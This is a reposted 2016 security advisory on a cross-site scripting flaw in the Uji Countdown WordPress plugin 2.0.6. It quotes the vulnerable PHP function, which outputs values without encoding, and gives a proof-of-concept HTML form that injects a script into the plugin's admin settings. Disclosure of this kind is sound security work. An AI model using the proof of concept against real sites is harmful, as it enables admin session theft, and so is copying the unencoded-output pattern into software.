Home / os / winmobile

WordPress Uji Countdown 2.0.6 Cross Site Scripting

Posted on 03 August 2016

------------------------------------------------------------------------
Cross-Site Scripting in Uji Countdown WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Uji Countdown
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0029

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Uji Countdown WordPress Plugin
version 2.0.6.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Uji Countdown version 2.0.7.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_uji_countdown_wordpress_plugin.html

The issue exists in the file /classes/class-uji-countdown-admin.php and is caused by the lack of output encoding in the ujic_tabs_values() function.

private function ujic_tabs_values() {
global $wpdb;
$ujictab = '';
$table_name = $wpdb->prefix . "uji_counter";
$ujic_datas = $wpdb->get_results( "SELECT * FROM $table_name ORDER BY `time` DESC" );
if ( !empty( $ujic_datas ) ) {
foreach ( $ujic_datas as $ujic ) {
$ujic_style = !empty( $ujic->style ) ? $ujic->style : 'classic';
$ujic_ico = '<span id="ujic-style-' . $ujic_style . '" class="ujic-types">' . $ujic_style . '</span>';
$ujictab .='<tr>
<td>' . $ujic->time . '</td>
<td>' . $ujic->title . '</td>
<td>' . $ujic_ico . '</td>
<td>
<a href="?page=uji-countdown&tab=tab_ujic_new&edit=' . $ujic->id . '"><i class="dashicons dashicons-welcome-write-blog"></i>Edit</a> | <a href="options-general.php?page=uji-countdown&del=' . $ujic->id . '"><i class="dashicons dashicons-trash"></i> Delete</a>
</td>
</tr>';
}
}

return $ujictab;
}
In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.

Proof of concept
<html>
<body>
<form action="http://<target>/wp-admin/options-general.php?page=uji-countdown&tab=tab_ujic_new&style=classic&save=true" method="POST">
<input type="hidden" name="ujic_style" value="classic" />
<input type="hidden" name="ujic_name" value=""><script>alert(1);</script>" />
<input type="hidden" name="ujic_goof" value="ABeeZee" />
<input type="hidden" name="ujic_pos" value="center" />
<input type="hidden" name="ujic_d" value="true" />
<input type="hidden" name="ujic_h" value="true" />
<input type="hidden" name="ujic_m" value="true" />
<input type="hidden" name="ujic_s" value="true" />
<input type="hidden" name="ujic_txt" value="true" />
<input type="hidden" name="ujic_size" value="32" />
<input type="hidden" name="ujic_col_dw" value="#a61ba6" />
<input type="hidden" name="ujic_col_up" value="#c368c3" />
<input type="hidden" name="ujic_col_txt" value="#ffffff" />
<input type="hidden" name="ujic_col_sw" value="#000000" />
<input type="hidden" name="ujic_col_lab" value="#000000" />
<input type="hidden" name="ujic_lab_sz" value="13" />
<input type="hidden" name="ujic_subscrFrmWidth" value="100" />
<input type="hidden" name="ujic_subscrFrmAboveText" value="Join Our Newsletter" />
<input type="hidden" name="ujic_subscrFrmInputText" value="Enter your email here" />
<input type="hidden" name="ujic_subscrFrmSubmitText" value="Subscribe" />
<input type="hidden" name="ujic_subscrFrmSubmitColor" value="#ab02b2" />
<input type="hidden" name="ujic_subscrFrmThanksMessage" value="Thanks for subscribing" />
<input type="hidden" name="ujic_subscrFrmErrorMessage" value="Invalid email address" />
<input type="hidden" name="submit_ujic" value="Save Style" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

 

TOP

Malware :

Exploits :